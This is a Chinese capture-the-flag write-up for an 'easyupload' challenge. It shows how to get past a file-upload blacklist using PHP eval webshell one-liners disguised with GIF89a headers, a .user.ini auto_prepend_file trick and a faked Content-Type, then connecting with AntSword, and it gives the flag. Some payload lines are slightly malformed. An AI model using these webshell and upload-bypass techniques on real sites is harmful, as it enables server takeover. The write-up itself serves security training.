CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST'a');?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST'aaa'); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
LYFlied34 分钟前
EVMbench解读:AI Agent如何检测、修复并利用智能合约漏洞
人工智能·网络安全·openai·智能合约·ai agent·evm·智能合约区块链
WZF-Sang3 小时前
网络基础——2
服务器·网络·c++·学习·网络编程·php
行思理4 小时前
fastadmin 新手部分功能点
后端·php
用户3074596982074 小时前
# GatewayWorker 入门指南
php
Hiyajo pray6 小时前
属性sdn隐私保护分析
网络安全
Hiyajo pray8 小时前
属性sdn的隐私保护策略(1)
网络安全
HackTwoHub9 小时前
某单位 CMS 完整渗透链、SQL 注入→后台拿权→绕过宝塔 Waf 上线 shell
数据库·人工智能·sql·安全·网络安全·系统安全·安全架构
杭州默安科技9 小时前
从告警到多防火墙联动封禁:智能体与XDR的自动化响应实践
人工智能·网络安全
2601_963771379 小时前
Optimizing Logistics and Transportation Sites on WordPress
前端·数据库·windows·php
草邦设计开发团队_媒体资源平台10 小时前
Linux 稳定常驻启动 PHP 队列,服务器重启自动恢复
linux·服务器·php·队列执行